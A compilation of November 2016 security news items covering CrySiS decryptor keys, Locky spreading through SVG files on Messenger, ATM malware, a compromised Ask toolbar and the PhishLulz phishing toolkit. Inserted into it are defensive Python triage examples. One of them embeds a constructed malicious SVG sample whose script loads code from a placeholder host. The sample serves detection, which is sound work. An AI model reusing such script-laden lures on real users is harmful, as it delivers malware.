“In 2014, Canada’s then Conservative government took the unusual step of singling out Chinese-based hackers for attacking a key computer network and lodged a protest with Beijing,” Reuters reported.

ESET Crysis decryptor to rescue files encrypted by the Crysis ransomware
23.11.2016 securityaffairs Virus

ESET has built the master decryption keys into a free decryption tool that lets victims recover their encrypted files without paying the ransom.
Good news for victims of the CrySiS ransomware: ESET has included the master decryption keys in a tool that rescues the encrypted files.

The master decryption keys for CrySiS were posted online in the BleepingComputer forums by a user known as crss7777, who shared a link to a C header file containing the actual keys and information on how to use them.

“In a surprise move, the master decryption keys for the CrySiS Ransomware have been released early this morning in a post on the forums. At approximately 1 AM EST, a member named crss7777 created a post in the CrySiS support topic at BleepingComputer with a Pastebin link to a C header file containing the actual master decryption keys and information on how to utilize them,” wrote Lawrence Abrams from BleepingComputer.

“These keys have already been used by Kaspersky Labs to update their RakhniDecryptor program so that it can be used to decrypt victim’s files.”


Lawrence Abrams speculates that crss7777 could be a member of the ransomware's development team.

“Though the identity of crss7777 is not currently known, the intimate knowledge they have regarding the structure of the master decryption keys and the fact that they released the keys as a C header file indicates that they may be one of the developers of the CrySiS ransomware,” said Abrams.

“Why the keys were released is also unknown, but it may be due to the increasing pressure by law enforcement on ransomware infections and the developers behind them.”

The CrySiS ransomware was first spotted by ESET in February; it has infected systems mostly in Russia, Japan, North and South Korea, and Brazil.

The malware spreads via email attachments with double file extensions or via malicious links embedded in spam emails.

The ransomware encrypts more than 200 file types, hunting for them on internal and external storage and on network shares, and deletes shadow copies to hinder recovery from backups.

CrySiS appends the .xtbl extension to encrypted files, renaming them in the format [filename].id-[id].[email_address].xtbl.
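The rename pattern and the double-extension lures described in the two paragraphs above are both things an incident responder can check for in a plain file listing, long before reaching for a decryptor. The triage below is an added example written for this page, not ESET's tool or the malware's own code; the file names are constructed, the contact address is a placeholder, and the decision to accept any alphanumeric victim ID is an assumption rather than a documented CrySiS detail.

```python
import re

# Added example (not ESET's decryptor): triage a file listing for the two
# CrySiS artefacts described above, the [filename].id-[id].[email].xtbl
# rename pattern and the double-extension email lures it spreads with.
CRYSIS_RE = re.compile(
    r"^(?P<orig>.+)\.id-(?P<id>[A-Za-z0-9]+)\.(?P<email>[^@\s]+@[^@\s]+)\.xtbl$"
)
EXEC_EXT = {"exe", "scr", "js", "jse", "vbs", "wsf", "bat", "cmd", "com", "pif", "hta"}
DECOY_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt", "zip"}

def parse_crysis_name(name):
    """Return the original name, victim ID and attacker contact encoded in an
    encrypted file's name, or None if the name does not match the pattern."""
    m = CRYSIS_RE.match(name)
    if not m:
        return None
    return {"original": m.group("orig"), "id": m.group("id"), "contact": m.group("email")}

def is_double_extension_lure(name):
    """'invoice.pdf.exe' style names: a document-looking extension in front of an executable one."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXEC_EXT and parts[-2] in DECOY_EXT

def triage(names):
    """Split a listing into encrypted files, delivery lures and everything else."""
    report = {"encrypted": [], "lures": [], "other": []}
    for name in names:
        parsed = parse_crysis_name(name)
        if parsed:
            report["encrypted"].append(parsed)
        elif is_double_extension_lure(name):
            report["lures"].append(name)
        else:
            report["other"].append(name)
    return report

# Constructed sample listing; the contact address is a placeholder.
SAMPLE_LISTING = [
    "Q3_report.xlsx.id-B4500913.decrypt@example.com.xtbl",
    "notes.txt.id-B4500913.decrypt@example.com.xtbl",
    "invoice_2016-11.pdf.exe",
    "archive.tar.gz",
    "holiday.jpg",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
```

The victim ID and contact address recovered from the names are what a decryptor keyed on the released master keys needs, and a single lure in a user's downloads folder next to dozens of .xtbl files usually points straight at the initial access vector. Note that archive.tar.gz is not a lure: a double extension is only suspicious when the outer one is executable.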

In June the experts observed a spike in infections, likely filling the gap left by the shutdown of TeslaCrypt.

Security experts observed that in Australia and New Zealand CrySiS targeted businesses by brute-forcing remote desktop connections and by compromising routers in order to re-infect cleaned-up computers.

“Crysis (detected by Trend Micro as RANSOM_CRYSIS.A), a ransomware family first detected in February this year, has been spotted targeting businesses in Australia and New Zealand through remote desktop protocol (RDP) brute force attacks,” Trend Micro reported in a blog post.

It is not clear why the crooks released the keys; they may have been trying to ease pressure from law enforcement agencies working to identify the operators behind the malware.

ESET has included the decryption keys in a free tool, ESET Crysis decryptor, and published instructions to use it.

Dangerous virus masquerades as a photo on Facebook. It is spreading in the Czech Republic too

22.11.2016 Novinky/Bezpečnost Viruses
Czech and Slovak users of the social network Facebook should be on their guard. A dangerous virus has begun spreading through it, specifically through the Messenger chat application. It is the notorious Locky, which belongs to the category of so-called ransomware. The antivirus company Eset warned of the threat.
The uninvited guest masquerades as a photograph. "In reality it is a vector graphics file which, when opened in the Google Chrome browser, redirects the user to a page resembling YouTube," warned Pavel Matějíček, technical support manager at Eset.

"There it prompts the user to install an extension for the browser in order to play a video. The Nemucod malicious code is then installed on the device, and its next task is to download the Locky ransomware onto the infected computer," Matějíček said.

Among the most widespread threats
Cybercriminals are deploying Locky more and more often. In September, according to the security company Check Point, it became the first ransomware to enter the Top 3 most widespread malware families, responsible for six percent of all attacks detected worldwide.

In Locky's case the cybercriminals infect the system via an email with a Word attachment containing a malicious macro. As soon as the user opens the file, the macro runs a script that downloads a malicious executable, which installs itself on the victim's computer and searches for files to encrypt. The user often does not even realize that the attack began with the click on the email attachment.

The cybercriminals then usually try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly levied for using illegal software and the like. That is one reason why many people have already paid the ransom.

Don't pay the ransom
Paying the ransom is no guarantee that users will get their data back. Instead of paying, the virus must be removed from the computer. In most cases, however, recovering data that was not backed up is impossible.

The lines above make clear why Locky is so notorious. "Its victims are not just ordinary users but also companies," Matějíček noted.

He also pointed out that Google itself, whose products the ransomware impersonates most often, is trying to fight the malware. "Google has now blocked all the malicious extensions that this campaign used to spread. It is possible, however, that the attackers will soon create new variants capable of spreading this or other malicious code via social networks," Matějíček added.

Hackers Steal Millions From European ATMs Using Malware That Spit Out Cash
22.11.2016 thehackernews Hacking
ATM hackers who long relied on tactics of stealing payment card numbers and online banking credentials to steal millions are now targeting the bank itself to steal cash directly from the machines.
Earlier this year, a gang of cybercriminals infected several ATMs in Taiwan and Thailand with malware that caused the machines to spit out millions in cash; gang members then stood in front of the infected ATMs at the appointed hour and collected the money.
Now, the FBI has warned U.S. banks of the potential for similar ATM jackpotting attacks, saying that the agency is "monitoring emerging reports indicating that well-resourced and organized malicious cyber actors have intentions to target the U.S. financial sector."
ATM jackpotting is a technique used to force automated teller machines to spit out cash.
According to Russian cyber security firm Group-IB, cyber crooks have this year remotely infected ATMs in more than a dozen countries across Europe with malware that forces the machines to dispense cash.
The world's two largest ATM manufacturers, Diebold Nixdorf and NCR Corp., said they were aware of the ATM attacks and had already been working with their customers to mitigate the threat.
Cyber criminals have targeted ATMs for at least five years, but earlier campaigns mostly involved small numbers of machines because the attackers needed physical access to each ATM to infect it and to collect the cash.
Group-IB did not name the banks targeted in the campaign but said the victims were located in Armenia, Bulgaria, Estonia, Georgia, Belarus, Kyrgyzstan, Moldova, Spain, Poland, the Netherlands, Romania, the United Kingdom, Russia, and Malaysia.
Both Diebold Nixdorf and NCR said they had already provided banks with information on how to thwart the attack, Reuters reported.
"We have been working actively with customers, including those who have been impacted, as well as developing proactive security solutions and strategies to help prevent and minimize the impact of these attacks," said Owen Wild, NCR's global marketing director for enterprise fraud and security.
The disclosure of the new campaign comes months after two large ATM hacks, wherein hackers stole $2.5 Million from Taiwan's First Bank and $350,000 from Thailand's state-owned Government Savings Bank.
While Group-IB believes the attacks across Europe were conducted by a single criminal group, dubbed Cobalt, the FBI believes the malware used could be linked to the Russian ATM gang known as Buhtrap, the Wall Street Journal reported.
Group-IB, citing the overlapping tools and techniques, also believes that Cobalt is linked to Buhtrap, which stole 1.8 Billion rubles ($28 Million) from Russian banks between August 2015 and January 2016.

Oracle acquires DNS provider Dyn for more than $600 Million
22.11.2016 thehackernews IT
Yes, Oracle just bought the DNS provider whose outage took a large part of the Internet down last month.
Business software vendor Oracle announced on Monday that it is buying cloud-based Internet performance and Domain Name System (DNS) provider Dyn.
Dyn is the company that was hit last month by a massive distributed denial of service (DDoS) attack from the Mirai botnet, which knocked many of the world's biggest and most popular websites offline for several hours.
Since the company provides cloud-based DNS service to customers such as Spotify, Netflix, Twitter and Pfizer, the acquisition will help Oracle's cloud customers to optimize their infrastructure costs and performance.
According to the press release, the Dyn acquisition "extends the Oracle cloud computing platform and provides enterprise customers with a one-stop shop for Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS)."
"Oracle Cloud customers will have unique access to Internet performance information that will help them optimize infrastructure costs, maximize application and website-driven revenue, and manage risk," said Kyle York, chief strategy officer of Dyn.
The company said Dyn's immensely scalable and global DNS is not just a critical core component but also provides a natural extension to Oracle's cloud computing platform.
So, the deal would help its cloud customers improve access and page-load speeds for their websites using internet performance information.
Oracle did not disclose the acquisition amount it paid for Dyn, but a source close to the deal told Fortune that Oracle paid somewhere between $600 Million and $700 Million to acquire Dyn.
Dan Primack reported that Oracle paid around $600 million for Dyn, though Dyn has yet to respond to a request for comment.
Oracle is far behind Amazon Web Services (AWS), the market leader in infrastructure cloud computing. The deal would let the company compete with Amazon's and Microsoft's managed DNS offerings, Route 53 and Azure DNS.

Michigan State University Data Breach, 400,000 Records Exposed

22.11.2016 securityaffairs Hacking

Hackers tried to extort Michigan State University after breaching a database containing 400,000 records of students and employees.
Crooks breached a Michigan State University database containing 400,000 student and employee records, then tried to monetize the intrusion by attempting to extort the institution.

Michigan State University reported that the breach occurred on November 13, when an unauthorized party gained access to a university server.

“Michigan State University has confirmed that on Nov. 13 an unauthorized party gained access to a university server containing certain sensitive data.

The database, which contained about 400,000 records, included names, social security numbers and MSU identification numbers of some current and former students and employees. It did not contain passwords or financial, academic, contact or health information.” reported the Michigan State University.

Of those records, 449 were confirmed to be accessed by the unauthorized party. The affected database was taken offline within 24 hours of the unauthorized access.”

The records accessed by the hackers contain personal information of current and former students and employees, including names, Social Security numbers, MSU identification numbers and dates of birth.

The MSU Police Department confirmed that it is investigating the case with federal law enforcement authorities.

The database includes records dating back to 1970; the university stressed that passwords, financial information and contact details were not included.

The university said it took the affected database offline within 24 hours after discovering the breach and it determined that only 449 of the records have been accessed by the hackers.

“At Michigan State University, we are committed to data and privacy protection. Regrettably, we were recently the target of a criminal act in which unauthorized users gained access to our computer and data systems. Information security is a top priority of our university, and we know the frustration this is causing members of our community.” said President Lou Anna K. Simon. “Only 449 records were confirmed to be accessed within the larger database to which unauthorized individuals gained access. However, as a precaution, we will provide credit monitoring and ID theft services for any member of our community who may have been impacted by this criminal act. We also will continue to work diligently in our efforts to protect the integrity of our data systems and improve the security of information that is entrusted to us.”

Representatives of the university told Fox47News that the hackers attempted to extort the organization after breaching its database.

This is the second time that the Michigan State University was hacked this year.

In October, the hacker Mys7erioN told me that he had hacked into Michigan State University.

As proof of the hack, Mys7erioN published on Pastebin records from a table containing user data, including names, logins, phone numbers, email addresses and encrypted passwords.

Mys7erioN discovered the SQL injection vulnerability while scanning websites.

In 2012, a hacker leaked 1,500 records from the university, and in 2013 the university confirmed that hackers had modified employee banking information using stolen credentials.

Ask.com infected toolbar gets stopped in its tracks before it gets started
22.11.2016 securityaffairs Virus

Security experts at Red Canary discovered attackers trying to use the Ask.com Toolbar as a vector to spread malware.
A just-in-time catch by sharp-eyed analysts at Red Canary thwarted what looks like early-stage development and deployment of malicious software delivered via Ask.com's toolbar.

The PE (Portable Executable) delivered by Ask.com, often bundled with Oracle Java installers, is a common browser search toolbar, viewed by users as an annoyance at best and as a PUP (Potentially Unwanted Program) or outright malware at worst.

From Ask’s own homepage they define what they do as “[We]… provide solutions to help software developers acquire and monetize users. We bring tremendous value to our partners via new revenue streams, increased customer engagement, and ongoing brand promotion.” This by its very definition describes the function of adware.

Red Canary immediately reported its findings to Ask, which it later thanked for its swift response in supplying a fix to mitigate the threat.

Red Canary's CSO, Scott McCammon, outlined the details of the investigation, Ask's response and the potential threat surface, stating:

“The impact of this event was minimized by the combination of Red Canary’s ability to identify behaviors not easily detected by software alone, our customers’ ability to respond, and the software vendor’s diligence with respect to mitigation. But we cannot allow the impact of one event to mask the substantial risk that this class of attack exposes. A software supply chain attack targeting a vendor with this type of reach could easily infect thousands or perhaps millions of endpoints worldwide.”

Once the compromised toolbar was installed, the included dropper fetched additional malicious programs such as banking Trojans and other online-fraud tooling.

Because the secondary payloads varied across the dozen or so compromised machines, the researchers concluded that the operation was at an early stage, with the attackers still experimenting with which kind of malware the foothold would ultimately deliver.

The CSO said there was no evidence that any one type of malware had yet been chosen for widespread propagation, and described what was being delivered as "off the shelf".

Although Ask has not yet explained the root cause of the compromise, Red Canary spotted the anomalies in the toolbar only through human analysis. McCammon said automated processes would not have flagged the indicators of compromise (IoCs) on their own, because the software passed all the standard criteria for expected behavior.

In this case the toolbar's binaries carried a legitimate Ask code signature; the signing timestamps, however, were one of the giveaways of the embedded malicious code. They were only hours old at the time of discovery, whereas a normal release lifecycle, with software passing through the usual layers of assurance, would put at least several days between signing and distribution.

The initial .exe spawned an additional .png file that was itself executing code, another red flag that alerted the fast-acting research team at Red Canary.
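The two giveaways in this story, a signature only hours old and a ".png" that executes, are both cheap to check mechanically once an analyst knows to look. The triage below is an added example written for this page, not Red Canary's detection logic or anything from Ask; the file name, file bytes and timestamps are constructed, and the 24-hour threshold for "too fresh" is an illustrative assumption, not a figure from the article.

```python
from datetime import datetime, timedelta

# Added example (not Red Canary's detection logic): two cheap triage checks
# for the red flags described above, a file whose content does not match its
# extension (a .png that is really a PE) and a code signature applied only
# hours before the binary was first seen in the field.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF8": "gif",
    b"%PDF": "pdf",
    b"MZ": "exe",   # PE: .exe and .dll share the MZ stub
}
_EXT_ALIASES = {"dll": "exe", "jpeg": "jpg"}

def declared_type(name):
    """Type the file name claims, normalised so .dll/.exe and .jpeg/.jpg agree."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return _EXT_ALIASES.get(ext, ext)

def actual_type(data):
    """Type the leading bytes actually indicate, or 'unknown'."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def masquerade(name, data):
    """Return (declared, actual) when extension and content disagree, else None."""
    declared, actual = declared_type(name), actual_type(data)
    if actual == "unknown" or declared == actual:
        return None
    return (declared, actual)

def _parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def signing_too_fresh(signed_at, first_seen, min_age_hours=24):
    """True when a binary shows up less than `min_age_hours` after it was
    signed; legitimate releases normally sit in QA for days after signing.
    Timestamps are ISO-8601 strings such as '2016-11-21T03:10:00'."""
    age = _parse_ts(first_seen) - _parse_ts(signed_at)
    return age < timedelta(hours=min_age_hours)

def triage_artifact(name, data, signed_at, first_seen):
    """Collect human-readable reasons to escalate one dropped file."""
    reasons = []
    mismatch = masquerade(name, data)
    if mismatch:
        reasons.append("content is %s but name says %s" % (mismatch[1], mismatch[0]))
    if signing_too_fresh(signed_at, first_seen):
        reasons.append("signed less than 24h before first sighting")
    return reasons

# Constructed sample: a PE stub dropped under a .png name, signed about five
# hours before it was first seen on an endpoint.
SAMPLE_NAME = "update_banner.png"
SAMPLE_DATA = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
SAMPLE_SIGNED = "2016-11-21T03:10:00"
SAMPLE_SEEN = "2016-11-21T08:40:00"

if __name__ == "__main__":
    for reason in triage_artifact(SAMPLE_NAME, SAMPLE_DATA, SAMPLE_SIGNED, SAMPLE_SEEN):
        print(reason)
```

Neither check proves malice on its own: vendors do sometimes ship hours after signing, and a PE with a wrong extension may be a packaging mistake. Together, and attached to a process tree in which a toolbar updater spawns the ".png", they are the kind of behavioural signal McCammon describes a signature check alone missing.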

Lost in Translation, or the Peculiarities of Cybersecurity Tests
22.11.2016 Kaspersky Analysis
In the book The Hitchhiker’s Guide to the Galaxy there’s a character called the Babel fish, which is curiously able to translate into and from any language. Now, in the present-day world, the global cybersecurity industry speaks one language – English; however, sometimes you really do wish there was such a thing as a Babel fish to be able to help customers understand the true meaning of the marketing messages of certain vendors.

Here’s a fresh example.

Earlier this month the independent testing lab AV-Comparatives conducted two tests of cybersecurity products simultaneously, using one and the same methodology. The only differences between the two were (i) the line-up of participating products and (ii) the names of the tests themselves: Comparative Test of Business Security Products and Comparison of ‘Next-Generation’ Security Products.

Strange? A little. So let me tell you what’s afoot here: why these practically identical tests were conducted at the same time.

It’s well known already (to folks interested in IT security) how some cybersecurity vendors try to avoid open, public testing and comparison with other products, so as not to expose their inadequacy. But by not taking part in such tests the marketing machinery of these vendors loses a ton of leverage: potential customers, mostly corporate ones, always consult independent tests run by dependable specialist organizations. So what were they to do? A solution was found: join up with other ‘next-gen’ developers to be tested together and separately (no ‘traditional AV’ allowed!), hide behind a convenient methodology, and coat it all with the BS buzz term ‘next generation’.

Days after the testing the ‘next-gen’ participants published their own interpretations of the results based on dubious logical deduction, manipulation of figures, and biased marketing rhetoric. And you guessed it – those interpretations brought them all to the same conclusion, that ~ “here, finally, it’s been publicly proven how next-gen reigns supreme over traditional products”!

Really? Ok, time we turned on the Babel fish…

Is it really true that next-gen products are great? And if so great… – great compared to what? Let’s compare the results of the ‘next-gen’ test with the above-mentioned twin-test – i.e., the same test (using the exact same methodology), only with different (non ‘next-gen’) participating products.

Important: the true quality of protection should be judged by the figure outside the brackets, which corresponds to the protection rate, not the detection rate: there is no point in merely detecting an attack and then letting it take place, i.e., not stopping it.

Protection from malware in different scenarios and false positives:


Protection against exploits:


Well, I can hear how the clanging of medals in the next-generation camp seems to have come to a sudden halt, while their ‘victorious’ self-published reports can now be seen for what they really are: mere attempts to intentionally deceive users ‘in the best traditions of misleading test marketing‘.

Judge for yourself:

One participant’s press release appears to have forgotten to mention its bombing on protection from exploits (28%), while also seeming to have swapped its protection-rate result in the WPDT scenario (100% instead of 98%).

Another participant also kept quiet about its modest result on protection from exploits (82%), yet proudly described its last-but-one place in that category as “…outperform[ing] other endpoint security competitors in exploit protection”. It also preferred not to mention coming last in the AVC scenario test, which didn’t stop it claiming that mythical ‘legacy AV’ (whatever that is) simply MUST be replaced by its products.

A third participant got straight to the point by laying claim to the crown of ‘most next-gen of all’, having received nothing short of a blessing, a certification, from this test lab to replace mythical ‘legacy AV’ with its next-gen products:


The Babel fish has a few other questions regarding this test.

The methodology used this time for testing protection against malicious programs was simpler than that used in the regular full-fledged Real World Protection Test, by which other (non-‘next-gen’) products are normally certified. In the Real World Protection Test, six times more real cyberattack scenarios (WPDT) are run each month, for a whole year. Even adding the RTTL and AVC scenarios doesn’t make up for this simplification.

So why was simplification of the methodology and a division of the participants (into ‘next-gen’ and ‘business’) needed? Was it an indulgence to the next-gen vendors, which were afraid of flopping big-time on regular tests? How well would these developers do in a full-fledged test together with the technological leaders?

And the last question: what is ‘next generation’?

According to a comprehensive study by the SANS Institute, conducted at the request of another self-proclaimed ‘next-gen’ vendor, the category ‘Next-generation AV’ covers all large vendors of cybersecurity solutions. Moreover, many ‘next-gen’ vendors do not qualify for the ‘Next-generation AV’ tag, especially when it comes to effectiveness and protection from zero-day threats:


I can’t say that I fully agree with the above-mentioned definition: absent from it are such important things as multi-level protection, adaptability, and the ability not only to detect but also to prevent, react to and predict cyberattacks, all of which matter far more to the user. However, even this definition unequivocally states that all products need to be tested according to one and the same methodology.



First (in spite of everything): I want to express my thanks to AV-Comparatives for finally being able to conduct a public test of several ‘next-gen’ products. Ok, so the methodology used was WPDT-lite, and the test results can’t be used to directly compare participants. Still, as they say, you can’t have everything straight away, and the first step is always the most difficult: the main thing is that ‘next-gen’ has finally been publicly tested by an authoritative independent lab, which is just what we’d been wanting for a long time.

Second: I hope that other independent test labs will follow AV-Comparatives’ example in testing ‘next-gen’ – preferably as per AMTSO standards – and, crucially, together with all vendors. And I hope the vendors, in turn, won’t throw obstacles in the test labs’ way.

Third: When choosing a cybersecurity solution it’s necessary to take into account as many different tests as possible. Reliable products set themselves apart by constantly notching up stable top results in different tests by different independent labs over many years.

And finally: Now, in the nick of time for the planning of budgets for next year, I hope ‘next-gen’ developers will allocate more resources to the development of technologies and participation in public tests, rather than on fancy advertising billboards, planned inaccuracies in press-releases, and expensive parties stuffed with celebrities.

‘Next-gen’ security products manipulate public tests

PS – from Babel fish:

“The word combination ‘next-generation security’ and its derivations in public communications – be they marketing material, advertising videos, white papers, or the arguments of a sales manager – can be a sign of aggressive telepathic matrixes directed at the promotion of pure BS, and thus necessitate a particularly astringent practical application of critical reason.”

Warning: a pest has hit Facebook Messenger. It spreads in an image with the SVG extension
21.11.2016 Živě.cz
Social networks
A malicious script is spreading via Facebook Messenger. It poses as an image with the SVG extension and keeps spreading without users' knowledge. If a suspicious message with such an image has arrived from someone you know, do not click on it.

SVG is a file format that describes vector graphics using XML. It is an open vector format commonly used to render 2D graphics on the web. It is compact and, unlike raster formats (JPEG, GIF), it can be scaled without any loss of display quality. Instead of information about individual pixels, it contains code that describes objects and their properties. The browser then takes care of rendering it correctly at any size.

First just an image named photo_***.svg, then only an apology from the compromised user

In the current case, however, a script has been crammed into the SVG file's code that calls further external code. On a mobile phone it brings up a fake update prompt; on a computer it links to a fake page posing as a copy of YouTube that pushes the installation of a browser add-on. The goal is always to get malware onto the phone or computer. According to current findings, it mainly ensures further spread of the script among Facebook friends. But the potential for abuse is considerable.

If you receive a message like this, do not click on it; just alert whoever sent it to you. Replying via Messenger is fine, nothing threatens you.

If, on the other hand, someone alerts you that you are sending them a strange message with an SVG image, disconnect all linked apps from your Facebook account, clear your browser's cookies and cache (Ctrl+Shift+Del), change your password, and carefully check the apps installed on your mobile phone or tablet as well. Uninstall any unknown or unused ones. To be safe, then check your computer with an antivirus tool, whether the Defender built into Windows or an external one.

CrySis is no longer a scare. Security experts have cracked another ransomware virus

21.11.2016 Novinky/Bezpečnost Viruses
Security experts from Kaspersky Lab have dealt with another ransomware virus. This time they managed to crack the malicious code called CrySis, which could lock infected machines and demanded a ransom to unlock them. The Security Affairs site reported it.
The researchers took advantage of the fact that decryption keys for this pest from the ransomware family (the umbrella term for all extortion viruses) appeared on the web.

They therefore implemented them in a tool called Rakhni Decryptor, with which people can now unlock locked computers and regain access to blocked data. The tool can be downloaded for free from its creators' website, but it is only available in English.

An attack scenario like a carbon copy
The attack by the uninvited guest CrySis follows the same scenario as other ransomware viruses. First, the pest encrypts all data stored on the hard disk. The attackers then demand a ransom for restoring access, easily several thousand crowns.

Cybercriminals usually try to give the owner of the infected machine the impression that they will get their files back after paying the ransom. Even then, however, users may not regain access to their data.

Instead of paying the ransom, the virus must be uninstalled from the computer. In most cases, however, it is impossible to recover data that was not backed up. That is no longer true for CrySis. Similarly, security experts previously cracked the malicious code called Polyglot.

Billions are at stake
It should nevertheless be noted that malicious code from the ransomware family still poses a major risk to users. By the most conservative estimates there are dozens, more likely hundreds, of variously modified versions. And cybercriminals try to deploy them in the vast majority of attacks.

Ransomware viruses enjoy such popularity mainly because they are a very lucrative business for the pirates. According to estimates by the US Federal Bureau of Investigation (FBI), one particular malicious virus earned computer pirates billions.

Computer pirates are said to have made big money thanks to the malicious code called TeslaCrypt. In the first quarter of this year alone, according to FBI estimates, this uninvited guest earned them more than 200 million dollars, i.e. almost five billion crowns.

Watch out, Locky ransomware spread via SVG images on Facebook Messenger
21.11.2016 securityaffairs Virus

Researchers have discovered a new hacking campaign leveraging Facebook Messenger to spread the Locky ransomware via SVG images.
The Locky ransomware is spread via a downloader; experts noticed that it is able to bypass Facebook's defense measures by pretending to be a harmless image file.

The campaign was first spotted during the weekend by the malware expert Bart Blaze and by the researcher Peter Kruse.

“Earlier today, a friend of mine notified me of something strange going on with his Facebook account; a message containing only an image (an .svg file in reality) had been sent automatically, effectively bypassing Facebook’s file extension filter:” wrote Bart Blaze in a blog post.


The SVG image file can be used by attackers as a sort of container that can include malicious code such as JavaScript.

In May 2015, researchers at the AppRiver security firm discovered a malicious campaign that was distributing a strain of ransomware by exploiting SVG files.

SVG (Scalable Vector Graphics) is an XML-based vector image format for two-dimensional graphics with support for animation and interactivity. SVG images define their behavior in XML text files; this makes it possible for an SVG image to be searched, indexed, scripted, and compressed. Although SVG images can be created and edited with any text editor, they are more often created directly with image-editing software.

The experts at AppRiver noticed that threat actors in the wild were exploiting a small JavaScript entry contained in the SVG files that allowed them to redirect victims to a website used to serve the Cryptowall malware.

“These SVG files however contained a small javascript entry that would open a webpage to download some malware.” AppRiver researchers said in a blog post. “The IP link in question ends up forwarding to another domain where a zip is downloaded of the actual exe payload. It didn’t auto execute, user interaction would still be needed for that. “
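Because SVG is XML, the scripting hooks an image can carry are visible to a plain parser before any browser renders them. The following is an added example, not code from Živě.cz, Bart Blaze, AppRiver or this article: a static audit that flags the three hooks described above (script elements, on* event handlers, javascript: links), run over two constructed sample documents, one clean icon and one stand-in for the lure that points at a placeholder host.

```python
"""Added example: static audit of an SVG for active content.
Both sample documents below are constructed for this example; the host
example.invalid is a placeholder, not an indicator from the campaign."""

import xml.etree.ElementTree as ET


def _local(qualified):
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return qualified.rsplit("}", 1)[-1]


def audit_svg(data):
    """Return [(finding, detail)] for one SVG document (bytes or str).

    Findings raised:
      script-element  - a <script>, inline or pulled in via (xlink:)href
      event-handler   - any on* attribute (onload, onclick, onbegin, ...)
      javascript-uri  - an href whose target is a javascript: URI
    A purely geometric SVG yields an empty list.
    """
    try:
        # Production code would parse through defusedxml to cap entity expansion.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [("parse-error", str(exc))]

    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            refs = [v for k, v in el.attrib.items() if _local(k) == "href"]
            body = (el.text or "").strip()
            detail = "external:" + refs[0] if refs else "inline:" + body[:60]
            findings.append(("script-element", detail))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):
                findings.append(("event-handler", f"<{name} {aname}>"))
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(("javascript-uri", f"<{name}> {value.strip()}"))
    return findings


def is_suspicious(data):
    """True when the document carries any active content (or cannot be parsed)."""
    return bool(audit_svg(data))


# Constructed: a harmless icon, nothing but geometry.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">
  <circle cx="8" cy="8" r="6" fill="#3b5998"/>
</svg>"""

# Constructed stand-in for the photo_***.svg lure: no picture data at all,
# only hooks that run code and fetch a second stage from a placeholder host.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="stage2()">
  <script xlink:href="http://example.invalid/loader.js"/>
  <a xlink:href="javascript:stage2()"><text y="12">photo</text></a>
</svg>"""


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, "->", audit_svg(doc))
```

A mail or chat gateway that accepts .svg uploads can apply this check before trusting the file as an image; anything with findings deserves the same handling as an executable attachment.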

Back to the present, the new attack leverages a downloader called Nemucod that is spread via Facebook Messenger as a .svg file, as confirmed by Peter Kruse via Twitter.
peterkruse @peterkruse
Confirmed! #Locky spreading on #Facebook through #Nemucod camouflaged as .svg file. Bypasses FB file whitelist. …
20:04 - 20 Nov 2016
When the victim accesses the malicious SVG file it will be directed to a website that appears to be YouTube in design only, but once the page is loaded, the victim is asked to install a codec in order to play the video that is shown on the page.

“A website purporting to be Youtube, with a video from Facebook – of course, you needed to install an additional extension to view it :)” continues Bart Blaze.

If the victim installs the Chrome extension as requested on the page, the attack is then spread further via Facebook Messenger. The experts observed that sometimes the malicious Chrome extension installs the Nemucod downloader, which launches the Locky ransomware attack.

The experts warn of several variants of the attack and likely several malicious extensions used to spread malware like the Locky Ransomware.

“Currently, I’m not exactly sure what this extension is supposed to do beside spreading itself automatically via Facebook, but likely it downloads other malware to your machine.” Blaze added in the post.

If you get infected, remove the malicious extension from your browser as soon as possible.

Security expert presented a PhishLulz tool for professional phishing pen test
21.11.2016 securityaffairs Phishing

The security expert Michele Orru from FortConsult has released an automated phishing toolkit dubbed ‘PhishLulz’ for penetration testing activities.
The security expert Michele Orru from FortConsult, aka @antisnatchor, has released an automated phishing toolkit dubbed ‘PhishLulz’ for penetration testing activities. The PhishLulz tool was presented at the Kiwicon hacking event held in Wellington, New Zealand last week.

PhishLulz is a tool written in Ruby that leverages Amazon EC2 cloud instances for its phishing campaigns. The toolkit provides a GUI from the PhishingFrenzy kit and combines it with the Browser Exploitation Framework Project (BeEF).

The tool also includes a self-signed certificate authority and new phishing templates that could be used by penetration testers for their analysis. Orru also announced automatic domain registration as a future improvement; in the current version it is limited to the registrar NameCheap.

The toolkit allows an attacker to easily compose efficient phishing campaigns; it is quite easy to compose malicious messages that appear legitimate. The tool will promptly alert the attacker when a victim takes the bait. Through BeEF, PhishLulz is also able to send exploits and gather target configuration information such as the operating system, browser versions, and running applications.

The tool includes MailBoxBug and also works with Office365 accounts to send out phishing messages.

Orru presented the results of the tests conducted against an unnamed Australian Government agency: PhishLulz deceived 40 percent of its staff, who revealed corporate VPN credentials.

“I was in Poland, and they were in Australia, so I had to send the emails at the right time,” Orru told the hacking conference.
“With five minutes to run the PhishLulz VM, five minutes to start modifying the template and upload the certificates you need, you’re ready to go.”

Orru provided interesting insights on phishing campaigns; for example, attackers will have an hour to exploit the dozen or so logins they receive before the victims notice the attack and revoke them.

